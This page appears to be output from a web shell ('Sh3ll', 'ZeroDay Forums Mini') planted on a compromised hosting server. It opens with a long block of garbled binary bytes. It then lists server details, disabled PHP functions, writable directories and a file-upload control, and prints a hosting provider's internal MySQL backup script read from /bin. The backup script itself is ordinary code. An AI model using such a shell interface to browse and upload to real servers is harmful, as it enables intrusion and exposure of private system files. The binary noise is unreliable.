w��t�����Թ�Ti��7M:G���Y�K5�'^���W���?��C��>_�G�q��/�S��&d| ��k�_g�O� ӊi�Je��H�U G�_ Ê�g#),�}�-�:��5�>V��1��em�q}��t}�q?m��e�K����U�:��Bq��JeiP�ɗ#$�sI} ��Z生��ƫ�����oo�=�V=pV�cU���g�"%����w��E��m�叡���v��Id����hr���Ȕ����~F]p�58�_�.���,�O�|�'�Ɇ^L��!c��6OWӷ������{x������9�?����F�p�?ceO�u�T�+�Uɵݹ&��gx9���i퓃sx��GI������m}�_3�Ī�r#:�ԣ��?4ב�c[����jö�#��B7K�ʌWNo)�=+c�� �}Yv�P{�lv^�r+��<�i�}���l��k�&ߧY5��Z�ƍ���m�Ŗ���N��Y�9KM�I���d�GOR>�5Vx��x�_���:~=�̌���Q����}CTy+�Wh����鸚f$101뢊�F[#--��Y��i��@����l��)W8��/�E��>�8n��l�j/kt�O��ľ�����,��q*�[s�E��[�]:?�ZeQ����v��Ŕ�ɺ|�j(��Wx����,LW=:�S��?κ��q%8���1c)���jJvO�DLi�W,{96vr�-2��}-��E�H��,����}�%�3k��#l5�g����l~x�_���_W Sڎ �8Y��JQ�vA�=Q���IW��ju��6-��X�9�$�k�WЩ�CI�4�U��W������d��'&O�/C�f���=�P���i�/�#+>���n���$���K�Y�st܅�y4ʷ�D���^~%�~m�yj�,�s_4�Q�}΍��C����ή;S�W�����:�h=�Ff�{����.��B/in�ȇ���o���=�-�T͸���O��Y�2}h�l��K}�������.m7-z�?���,f-�/^����b�Q����W��s/���_͔/3I�n��[�6���M;l� �y�gؼ!W���UË_�)D���9����Y�L�4�����_��>f�}ϵ3h�V5����Oѣ��(�l�8�?L�4蹥���������[��-��Э=��7�V{���&�ʢP�������ʼ���*�3�c���Mz>���u��4�@�[�oM���� g�K����S[jy��"����L��ھz�ɵ�f�x)����GE���`ֿ.=k�J>/iˢ[��j�-�qץQ���C B@�o��� ��V��(��ʯ������G���?B�����ܻ�I���>�=K-��]���.���(�vO�E�.�5�׮=�/���P��f��^&�$��c�aY�����9{��3�މ�%�Y�O�����xZ�~�6�Z�;�������;�ԗ.�NJ�zş/�YϖĜ%ѿO��^���t�Y$��ν��4|e}2�ɶ��U9A��؜h˺�L�r�Im%�J�.�|I�]��k�G��|<��j��P��3,�9Uq�7��i�>�DzU k�4'(��T9߱^!z� -:�mW^������ <= �<�^�2�*;����Se���q(��6ª��s��H����f��5ʸO���{��Il�r~G ����u�JY^k�5X�_���y���;��5�'�59O@�ƣ�̶>��p�����n��COvN��wX���4�o�����U��Uf����]Џe%�MV�9�X��m�9���]�x�'Q�=���82z�)c�/~1���~�L�S���ow�>�ﺍ�ƻ��U�q���������l~�Sqo����羘s�k���}V�j�G7���1�kY��ؽ��]b��4qnM�ӡ��; �w@̇I��L㿗�����[4�3)]�=�v*)EH���'��a�񖳋�ҎT�k������x���uXG���K�& Z��I����R���(M8?�:�i�x�Jp��-�d��mck��pu*%N^-7E����3<��uc�>�����='��ce���E�&�'�;��_��J'��M�w𶥏��Y9�+�d9����+>���!���e��������_Sn|���VX � �-��TZ�u]��Ģ���/�6�ck�r�� /ޗ��/���z��[y.N�:*k�$ �}Yǭ�}GU�m�^-��%d�m�;K��_#c��t�B���[ss�g2�:8r�z���-�VE|���T� w��.�}w9NEP�Gn���oCe�8�/&3�qT�}MJ̙M���ۗ~��哳�,-�WI�_�Bs����h�+~�͛vN����{�Z�����dYK�ݲ�k�����r%�+lo�*r�e�-ه?�:vYqF��fC�s�q�M���XR�ķ{y�q�g�r�x�.�o��Ǔ��x�d���ڗ_Z�C9�W������o��mX|Km��V��_%U�J�ܷr���$��drȳ���L��~Mo�K����yY�L���i�c� J�q�<�1$�U�u�ٯTד374s�<���������ĕ96�춉r9�� ��p��������Gc�9�=�p�^�:)ZJb�&��V�ӝ��Xٽ 0�/���X�& ۳�*_ԙ���Ə.5�J�� ��6<����$��$��6����B0��d�����_��d?h�q���d>X�Ce-� wO�@p�g:�.>$�.Ϣ~L޲��|,{-ɪ2��.u�/Ds-[ُiVIW��K����5�M#F��ܭ3?x�����.)�ۣ�,�w���J)�Ȳڣ-�#��fbdq&�T�ͧ�8�����Q�,�YqQ�)�/�R��­?�k��˔��[��p�_�+�og��z����P��[��6�r��^��o���}�����_��k�T�}J�i��J;���<�ivE������H8�wI�@�MO�P�ʊ�#��+��$�� 404 Not Found
Sh3ll
OdayForums


Server : Apache
System : Linux vpshost1491.publiccloud.com.br 4.4.79-grsec-1.lc.x86_64 #1 SMP Wed Aug 2 14:18:21 -03 2017 x86_64
User : aloic1 ( 10003)
PHP Version : 8.0.14
Disable Function : apache_child_terminate,dl,escapeshellarg,escapeshellcmd,exec,link,mail,openlog,passthru,pcntl_alarm,pcntl_exec,pcntl_fork,pcntl_get_last_error,pcntl_getpriority,pcntl_setpriority,pcntl_signal,pcntl_signal_dispatch,pcntl_sigprocmask,pcntl_sigtimedwait,pcntl_sigwaitinfo,pcntl_strerror,pcntl_wait,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,php_check_syntax,php_strip_whitespace,popen,proc_close,proc_open,shell_exec,symlink,system
Directory :  /bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //bin/mybackup.py
#!/usr/bin/python -W ignore::DeprecationWarning
# -*- coding: utf-8 -*-

import os
import sys
import socket
import fcntl
import subprocess
import ConfigParser
import MySQLdb
import syslog
import re
from glob import glob
from time import sleep, strftime
from datetime import date, datetime
from pwd import getpwnam
from MySQLdb import cursors
from contextlib import nested

syslog.openlog('mybackup', syslog.LOG_PID, syslog.LOG_SYSLOG)

class DroppedDatabase(Exception): pass

class MyBackup(object):

    def __init__(self):
        conffile = "/etc/locaweb/mybackup/mybackup.conf"
        confCatalog = "/etc/locaweb/mybackup/mycatalog.conf"
        if not os.path.isfile(conffile) or not os.path.isfile(confCatalog): 
            syslog.syslog(syslog.LOG_ERR, "[ERROR] - Problem loading configuration file")
            print "Problem loading configuration file"
            sys.exit(1)
        self.initConf(conffile)
        self.initConfCatalog(confCatalog)
        self.connection()

    def initConf(self, conffile):
        self.hostname = socket.gethostname().split(".")[0]
        config = ConfigParser.ConfigParser()
        config.readfp(open(conffile))
        self.user = config.get('mybackup', 'user')
        self.password = config.get('mybackup', 'password')
        self.host = config.get('mybackup', 'host')
        self.backup_db = config.get('mybackup', 'dbname')
        self.backup_root_path = config.get('mybackup', 'backup_root_path')
        self.mybackup_path = config.get('mybackup', 'mybackup_path')
        self.backup_path = "%s%s" % (config.get('mybackup', 'backup_path',), strftime("%Y%m%d"))
        self.db_ignore = config.get('mybackup', 'db_ignore')
        self.lock_time = config.get('mybackup', 'lock_time')
        self.lock = config.getboolean('mybackup', 'lock')
        self.filesize = config.get('mybackup', 'filesize')
        self.owner = getpwnam(config.get('mybackup', 'owner'))

    def initConfCatalog(self, confCatalog):
        config = ConfigParser.ConfigParser()
        config.readfp(open(confCatalog))
        self.user_catalog = config.get('mycatalog', 'user')
        self.password_catalog = config.get('mycatalog', 'password')
        self.host_catalog = config.get('mycatalog', 'host')
        self.backup_db_catalog = config.get('mycatalog', 'dbname')
        self.ret_catalog = config.get('mycatalog', 'retention')
        self.engine = config.get('mycatalog', 'engine')

    def connection(self):
        try:
            syslog.syslog(syslog.LOG_INFO, "Connecting to database...")
            self.conn = MySQLdb.connect(self.host, self.user, self.password, cursorclass = cursors.DictCursor)
            self.cursor = self.conn.cursor()
            self.conn.autocommit(1)
            syslog.syslog(syslog.LOG_INFO, "Connecting to database catalog...")
            self.conn_catalog = MySQLdb.connect(self.host_catalog, self.user_catalog, self.password_catalog, cursorclass = cursors.DictCursor)
            self.cursor_catalog = self.conn_catalog.cursor()
            self.conn_catalog.autocommit(1)
        except Exception, e:
            syslog.syslog(syslog.LOG_ERR, str(e))
            sys.exit(1)

    def close(self):
        try:
            syslog.syslog(syslog.LOG_INFO, "Closing connection")
            self.conn.close()
            syslog.syslog(syslog.LOG_INFO, "Closing connection Catalog")
            self.conn_catalog.close()
        except Exception, e:
            syslog.syslog(syslog.LOG_ERR, str(e))

    def killLock(self):
        self.conn.ping(1)
        self.cursor.execute(""" SELECT ID, DB, TIME, INFO 
								FROM information_schema.PROCESSLIST
								WHERE TIME>%d 
								AND USER=%s 
								AND COMMAND='Query' 
								AND STATE='Waiting for table' INFO like '%LOCK TABLES%'""", (int(lock_time), self.user))
        if len(self.cursor.fetchone()) > 0:
            lock = self.cursor.fetchone()
            self.cursor.execute("""KILL %s""", (lock['ID'],))
            self.conn_catalog.ping(1)
            self.cursor_catalog.execute("""UPDATE mybackup_catalog SET 
													st_backup='KILLED', 
													st_compress='KILLED',  
													updated_at=NOW() 
											WHERE db=%s 
											AND host=%s 
											AND created_at = DATE(NOW())""", (lock['DB'], self.hostname))
            self.mysqlcheck(lock['DB'])
            syslog.syslog(syslog.LOG_ERR, "Killed Database: %s Time: %s Query: %s" % (lock['DB'], lock['TIME'], lock['INFO']))

    def mysqlcheck(self, database, mysqlcheck="/usr/bin/mysqlcheck"):
        syslog.syslog(syslog.LOG_INFO, "run mysqlcheck for database: %s" % database)
        try:
            subprocess.check_call([ mysqlcheck, "--auto-repair", "-B", database, "-u%s" % self.user, "-p%s" % self.password])
            self.conn_catalog.ping(1)
            self.cursor_catalog.execute("""UPDATE mybackup_catalog SET 
													st_backup='REPAIRED', 
													st_compress='REPAIRED', 
													updated_at=NOW() 
											WHERE db=%s 
											AND host=%s 
											AND created_at=DATE(NOW())""", (database, self.hostname))            
            syslog.syslog(syslog.LOG_INFO, "End repair database: %s" % database)
        except Exception, e:
            syslog.syslog(syslog.LOG_ERR, str(e))

    def getdatabsesstats(self):
        'Collect info for leela-agent'
        self.conn_catalog.select_db(self.backup_db_catalog)
        self.conn_catalog.ping(1)
        self.cursor_catalog.execute("""SELECT CURRENT_DATE, db, datadir_size
                                         FROM mybackup_catalog
                                        WHERE created_at = CURRENT_DATE
                                          AND db NOT IN ('mysql', 'teste', 'information_schema', %s)
                                     ORDER BY 1""", (self.backup_db_catalog,))
        return self.cursor_catalog.fetchall()

    def showDatabases(self, tipo):
        """Return all the databases. Excluded databases can be specified"""
        try:
            self.conn_catalog.select_db(self.backup_db_catalog)
            self.conn_catalog.ping(1)
            self.cursor_catalog.execute(""" SELECT db 
											FROM mybackup_catalog 
											WHERE (
													st_backup IS NULL 
													OR st_backup='ERROR' 
													OR st_backup='REPAIRED' 
													OR st_compress IS NULL 
													OR st_compress='ERROR'
												  ) 
											AND created_at = DATE(NOW()) 
											AND myisam = %s 
											AND host = %s 
											ORDER BY attempts, datadir_size""", (int(tipo), self.hostname))

            result = self.cursor_catalog.fetchall()
            databases = []
            fd = open(self.db_ignore)
            excludes = fd.read().strip().split()
            fd.close()
            for database in result:
                databases.append(database['db'])

            if excludes:
                for excludedb in excludes:
                    try:
                        databases.remove(excludedb)
                        self.cursor_catalog.execute("""UPDATE mybackup_catalog SET
                                                                st_backup='SKIP',
                                                                st_compress='SKIP',
                                                                updated_at=NOW(),
                                                                started_at=NOW(),
                                                                ended_at=NOW()
                                                        WHERE db=%s
                                                        AND host=%s
                                                        AND created_at=DATE(NOW())""", (excludedb, self.hostname))
                        syslog.syslog(syslog.LOG_INFO, "[INFO] - SKIP backup database: %s" % excludedb)
                    except ValueError:
                        pass
            return databases
        except Exception, e:
            syslog.syslog(syslog.LOG_ERR, str(e))
            sys.exit(1)
    
    def mysqldump(self, database, dbfile, mysqldump="/usr/bin/mysqldump"):
        syslog.syslog(syslog.LOG_INFO, "run mysqldump for database: %s" % database)
        if self.lock:
            lock_param = "--lock-tables"
        else:
            lock_param = "--skip-lock-tables"

        try:
            file_err = dbfile[:-7]
            with nested(open("%s.err" % file_err, "w+"), open(dbfile, "w+")) as (err, f):
                #p1 = subprocess.Popen([ mysqldump, "-u%s" % self.user, "-p%s" % self.password, database, "--opt", "-R", "--triggers", lock_param, "--force", "--max_allowed_packet=134217728" ], stdout=subprocess.PIPE, stderr=err, env={'LD_PRELOAD': 'libpreload-mysqldump.so'})
                p1 = subprocess.Popen([ mysqldump, "-u%s" % self.user, database, "--opt", "-R", "--triggers", lock_param, "--force", "--max_allowed_packet=134217728" ], stdout=subprocess.PIPE, stderr=err, env={'MYSQL_PWD': self.password})
                p2 = subprocess.Popen(["/bin/gzip", "--fast"], stdin=p1.stdout, stdout=f, stderr=subprocess.PIPE)
                output2 = p2.communicate()[1]
                returncode2 = p2.returncode

            with open("%s.err" % file_err) as f:
                output1 = f.readlines()

            p1.poll()
            returncode1 = p1.returncode
            os.remove("%s.err" % file_err)
            
            errors=[]
            warnings=[]
            warncodes=['1449','1556','1356']

            search = [ 'Got error: (\d+):', 'Couldn\'t execute.*\((\d+)\)' ]
            for msg in output1:
                msg = msg.strip()
                errcode = ''
                for s in search:
                    r = re.compile(s)
                    m = r.split(msg)
                    if len(m) > 1:
                        errcode = m[1]
                        continue
                if errcode and errcode in warncodes:
                    warnings.append('WARNING %s - %s' % ( errcode, msg ))
                else:
                    errors.append('ERROR %s - %s' % ( errcode, msg ))

            warnings_text='\n'.join(warnings)
            errors_text='\n'.join(errors) + '\n' + warnings_text
            
            for msg in warnings:
                syslog.syslog(syslog.LOG_WARNING, "Database: %s" % database + " - %s" % msg)

            for msg in errors:
                syslog.syslog(syslog.LOG_ERR, "Database: %s" % database + " - %s" % msg)

            syslog.syslog(syslog.LOG_INFO, "end mysqldump for database: %s" % database)
            
            if len(errors) == 0 and len(warnings) > 0:
                returncode1 = -1

            self.conn_catalog.ping(1)
            if returncode1 > 0:
                self.cursor_catalog.execute("""UPDATE mybackup_catalog SET      st_backup='ERROR',
									        message=%s 
										WHERE db=%s 
										AND host=%s 
										AND created_at=DATE(NOW())""", (errors_text, database, self.hostname))
            elif returncode1 < 0:
                self.cursor_catalog.execute("""UPDATE mybackup_catalog SET      st_backup='WARNING',
										message=%s 
										WHERE db=%s 
										AND host=%s 
										AND created_at=DATE(NOW())""", (warnings_text, database, self.hostname))
            else:
                self.cursor_catalog.execute("""UPDATE mybackup_catalog SET 
														st_backup='OK' 
											   WHERE db=%s 
  											   AND host=%s 
											   AND created_at=DATE(NOW())""", (database, self.hostname))
                
            if returncode2 > 0:
                self.cursor_catalog.execute("""UPDATE mybackup_catalog SET 
														st_compress='WARNING', 
														message=%s 
											   WHERE db=%s 
											   AND host=%s 
											   AND created_at=DATE(NOW())""", (output2, database, self.hostname))

                syslog.syslog(syslog.LOG_WARNING, "[WARNING] - compressing file for database: %s" % database + " Message: %s" % output2)
            elif returncode2 < 0:
                self.cursor_catalog.execute("""UPDATE mybackup_catalog SET
														st_compress='ERROR', 
														st_backup='ERROR', 
														message=%s 
												WHERE db=%s 
												AND host=%s 
												AND created_at=DATE(NOW())""", (output2, database, self.hostname))

                syslog.syslog(syslog.LOG_ERR, "[ERROR] - Error dumping/compressing file for database: %s" % database + " Message: %s" % output2)
            else:
                self.cursor_catalog.execute("""UPDATE mybackup_catalog SET 
														st_compress='OK' 
												WHERE db=%s 
												AND host=%s 
												AND created_at=DATE(NOW())""", (database, self.hostname))
                
            self.cursor_catalog.execute("""UPDATE mybackup_catalog SET 
													ended_at=NOW() 
											WHERE db=%s 
											AND host=%s 
											AND created_at=DATE(NOW())""", (database, self.hostname))
        except Exception, e:
            self.cursor_catalog.execute("""UPDATE mybackup_catalog SET 
													st_backup='ERROR', 
													st_compress='ERROR', 
													ended_at=NOW() 
											WHERE db=%s 
											AND host=%s 
											AND created_at=DATE(NOW())""", (database, self.hostname))
            syslog.syslog(syslog.LOG_ERR, str(e))

    def prepareBackup(self):
        try:
            if not os.path.isdir(self.backup_path):
                syslog.syslog(syslog.LOG_INFO, "Creating backup path %s" % self.backup_path)
                os.makedirs(self.backup_path)
                os.chown(self.backup_root_path, self.owner.pw_uid, self.owner.pw_gid)
                os.chown(self.mybackup_path, self.owner.pw_uid, self.owner.pw_gid)
                os.chown(self.backup_path, self.owner.pw_uid, self.owner.pw_gid)
        except Exception, e:
            syslog.syslog(syslog.LOG_ERR, str(e))

    def postBackup(self, database):
        syslog.syslog(syslog.LOG_INFO, "check backup file for database: %s" % database)
        try:
            self.conn_catalog.ping(1)
            backupFile = "%s/%s.sql.gz" % (self.backup_path, database)
            backupEmptyFile = "%s/%s.empty.sql" % (self.backup_path, database)

            if os.path.isfile(backupEmptyFile):
                self.cursor_catalog.execute("""UPDATE mybackup_catalog SET 
														st_backup='EMPTY', 
														st_compress='EMPTY', 
														filename=%s, 
														file_size=0, 
														updated_at=NOW() 
												WHERE db=%s 
												AND host=%s 
												AND created_at=DATE(NOW())""", (backupEmptyFile, database, self.hostname))
            elif os.path.isfile(backupFile) and os.stat(backupFile).st_size > int(self.filesize):
                self.cursor_catalog.execute("""UPDATE mybackup_catalog SET 
														filename=%s, 
														file_size=%s, 
														updated_at=NOW() 
												WHERE db=%s 
												AND host=%s 
												AND created_at=DATE(NOW())""", (backupFile, os.stat(backupFile).st_size, database, self.hostname))
                os.chown(backupFile, self.owner.pw_uid, self.owner.pw_gid)
            else:
                self.cursor_catalog.execute("""UPDATE mybackup_catalog SET 
														st_backup='ERROR', 
														st_compress='ERROR',
														filename=%s, 
														file_size=0, 
														updated_at=NOW() 
												WHERE db=%s 
												AND host=%s 
												AND created_at=DATE(NOW())""", (backupFile, database, self.hostname))
                os.chown(backupFile, self.owner.pw_uid, self.owner.pw_gid)
        except Exception, e:
            syslog.syslog(syslog.LOG_ERR, str(e))

    def showTables(self, database):
        """Return all tables for a given database"""
        try:
            tables = []
            sql="show tables from `%s`" % database
            self.conn.ping(1)
            self.cursor.execute(sql)
            result = self.cursor.fetchall()
            for table in result:
                tables.append(table[table.keys()[0]])
            return tables
        except MySQLdb.OperationalError, oe:
            """Get '1049 - Unknow Database' Exception"""
            if oe[0] == 1049:
                raise DroppedDatabase(oe)
            raise oe

    def runBackup(self, databases):
        for database in databases:
            try:
                self.conn_catalog.ping(1)
                syslog.syslog(syslog.LOG_INFO, "Start backup database: %s" % database)  
                tables = self.showTables(database)
                if len(tables) > 0:
                    self.cursor_catalog.execute("""UPDATE mybackup_catalog SET 
															attempts=attempts+1, 
															started_at=now(), 
															updated_at=now() 
													WHERE db=%s 
													AND host=%s 
													AND created_at=DATE(NOW())""", (database, self.hostname))
                    self.mysqldump(database, os.path.join(self.backup_path, "%s.sql.gz" % database))
                else:
                    self.cursor_catalog.execute("""UPDATE mybackup_catalog SET 
															st_backup='EMPTY', 
															st_compress='EMPTY', 
															started_at=now(), 
															ended_at=now(), 
															updated_at=now() 
													WHERE db=%s 
													AND host=%s 
													AND created_at=DATE(NOW())""", (database, self.hostname))
                    dbfile = "%s/%s.empty.sql" % (self.backup_path, database)
                    self.writeEmptyFile(dbfile)
                self.postBackup(database)
            except MySQLdb.OperationalError, oe:
                syslog.syslog(syslog.LOG_ERR, str(oe))
                sys.exc_clear()
                continue
            except DroppedDatabase, dd:
                syslog.syslog(syslog.LOG_WARNING, str(dd))
                self.cursor_catalog.execute("""UPDATE mybackup_catalog SET 
														st_backup='DROPED', 
														st_compress='DROPED', 
														updated_at=NOW(), 
														started_at=NOW(), 
														ended_at=NOW(), 
														message=%s 
												WHERE db=%s 
												AND host=%s 
												AND created_at=DATE(NOW())""", (dd, database, self.hostname))
                sys.exc_clear()
                continue
            except Exception, e:
                syslog.syslog(syslog.LOG_ERR, str(e))
                self.cursor_catalog.execute("""UPDATE mybackup_catalog SET 
														st_backup='ERROR', 
														st_compress='ERROR', 
														ended_at=now(), 
														updated_at=now(), 
														message=%s 
												WHERE db=%s 
												AND host=%s 
												AND created_at=DATE(NOW())""", (e, database, self.hostname))
                continue

    def writeEmptyFile(self, dbfile):
        try:
            fd = open(dbfile, "w")
            fd.close()
        except Exception, e:
            syslog.syslog(syslog.LOG_ERR, str(e))

    def summary(self):
        self.conn_catalog.ping(1)
        self.cursor_catalog.execute("""INSERT INTO mybackup_execution (host, datadir_size, file_size, started_at, ended_at, created_at) 
									   SELECT host, SUM(datadir_size), SUM(file_size),MIN(started_at),MAX(ended_at), NOW() 
                                       FROM mybackup_catalog 
                                       WHERE created_at=DATE(NOW()) 
									   AND host=%s""", (self.hostname,))

    def cleanBackup(self):
        try:
            self.conn_catalog.ping(1)
            self.cursor_catalog.execute("""DELETE FROM mybackup_catalog 
     									   WHERE created_at < DATE(NOW() - INTERVAL %s DAY) """, (int(self.ret_catalog),))
            syslog.syslog(syslog.LOG_INFO, "clean table catalog completed")
        except Exception, e:
            syslog.syslog(syslog.LOG_ERR, str(e))
	
if __name__ == '__main__':
    try :
        lock = open('/var/lock/mybackup', 'w')
        fcntl.flock(lock.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)

        mybackup = MyBackup()
        syslog.syslog(syslog.LOG_INFO, "=================== Start ===================")
        mybackup.prepareBackup()
        databases = mybackup.showDatabases(1)	
        mybackup.runBackup(databases)
        mybackup.summary()
        mybackup.cleanBackup()
        mybackup.close()
        syslog.syslog(syslog.LOG_INFO, "===================  End  ===================")
    except Exception, e:
        syslog.syslog(syslog.LOG_ERR, str(e))
        print str(e)
        sys.exit(1)

ZeroDay Forums Mini